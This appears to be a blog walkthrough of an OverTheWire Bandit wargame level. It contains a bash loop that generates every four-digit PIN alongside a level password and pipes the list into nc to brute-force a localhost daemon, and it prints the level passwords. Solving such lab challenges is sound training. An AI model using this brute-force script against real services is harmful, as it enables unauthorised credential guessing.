Level Goal
Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

Walkthrough
So we need to write an script again to bruteforce this. I only now a bit of bash, but this should be doable. Lets see which command we need to execute and how this works. Lets try the format: nc localhost poort password pin
It asks for the pin after the connection. Okaay. Lets try to echo the password and pin and pipe this into nc and see what it does. This works we get a please enter the correct pincode back. We can use this in our script, but we need a list of all the possible combinations.

So I googled on how to make a for loop to generate the 4 digital pincode and came up with this:

#!/bin/bash
password24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

for i in {0000..9999}
  do
    echo $password24 $i >> passlist.txt
  done

This generated the passlist.txt with the password and 0000 for example:

UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0000
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0001
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0002
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0003
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0004
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0005
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0006
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0007
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0008

So now the only thing I need to do is cat this file into nc and let it run? Lets try it.
cat passlist.txt | nc localhost 30002

This goes fast and it runs!, we got the password but no idea what pincode was entered. But we got the password: uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

Leave a Reply

Your email address will not be published. Required fields are marked *